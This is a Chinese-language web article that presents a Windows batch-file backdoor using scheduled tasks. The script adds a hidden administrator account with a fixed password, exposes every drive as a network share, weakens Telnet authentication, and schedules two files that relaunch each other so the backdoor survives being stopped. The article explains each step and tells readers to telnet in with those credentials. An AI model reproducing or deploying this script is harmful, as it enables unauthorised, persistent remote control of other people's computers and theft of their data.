首页 电脑 电脑学堂 查看内容

windows计划任务写永不被杀后门

2009-11-1 10:20 737 0

摘要: 程序代码  @echo off  @attrib +s +r hqw.bat  @net user hqw hack520org /add  @net localgroup administrator...
关键词: systemroot bat SYSTEM hqw log net 32 运行 share start

程序代码  @echo off  @attrib +s +r hqw.bat  @net user hqw hack520org /add  @net localgroup administrators hqw /add  @sc config lanmanserver start= auto  @net start server  @net share c$=c:  @net share d$=d:  @net share e$=e:  @net share f$=f:  @net share g$=g:  @net share h$=h:  @tlntadmn config sec = -ntlm  @sc config Schedule start= auto  @net stop "Task Scheduler"  @net start "Task Scheduler"  @echo at 11:00 %systemroot%\SYSTEM32\log.bat > %systemroot%\SYSTEM32\hqw.bat  @echo at 23:00 %systemroot%\SYSTEM32\log.bat >> %systemroot%\SYSTEM32\hqw.bat  @at 11:05 %systemroot%\SYSTEM32\hqw.bat  @at 23:05 %systemroot%\SYSTEM32\hqw.bat  @sc config tlntsvr start= auto  @net stop telnet  @net start telnet  @exit  这样就会循环运行我们的程序了,即使被人停下来,过几个小时(时间可以自己改)会自动重新运行,呵呵~~  运行后TELNET IP上去,用户名为hqw,密码为hack520org。  解释一下这个批处理的核心代码:  引用内容  把以上的批处理保存为log.bat运行后他自动生成  hqw.bat  其中  hqw.bat的内容为  at 11:00 %systemroot%\system32\log.bat  at 23:00 %systemroot%\system32\log.bat  @echo at 11:00 %systemroot%\SYSTEM32\log.bat > %systemroot%\SYSTEM32\hqw.bat  @echo at 23:00 %systemroot%\SYSTEM32\log.bat >> %systemroot%\SYSTEM32\hqw.bat  这个意思是  把at 11:00 %systemroot%\SYSTEM32\log.bat 写进%systemroot%\SYSTEM32\hqw.bat 文件..如果没有就自动创建  第二个  @echo at 23:00 %systemroot%\SYSTEM32\log.bat >> %systemroot%\SYSTEM32\hqw.bat  同理..不过因为第一句已经创建了..所以第二个直接添加at 23:00 %systemroot%\SYSTEM32\log.bat这里注意一定要是>>如果是>的话回直接覆盖那个hqw.bat文件  hqw.bat的作用是在特定的时间执行  log.bat的..其中log.bat执行后...又自动创建并覆盖hqw.bat  他两个就好比是在互相监视的  但如果log.bat被删除了话..这个批处理后门就没啥用了  如果你把这个批出来的文件名改为hqw.bat为不是log.bat运行后你会发现hqw.bat的内容由原来的换成了  at 11:00 %systemroot%\system32\log.bat  所以一定要把文件名改为log.bat这样才会成功
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部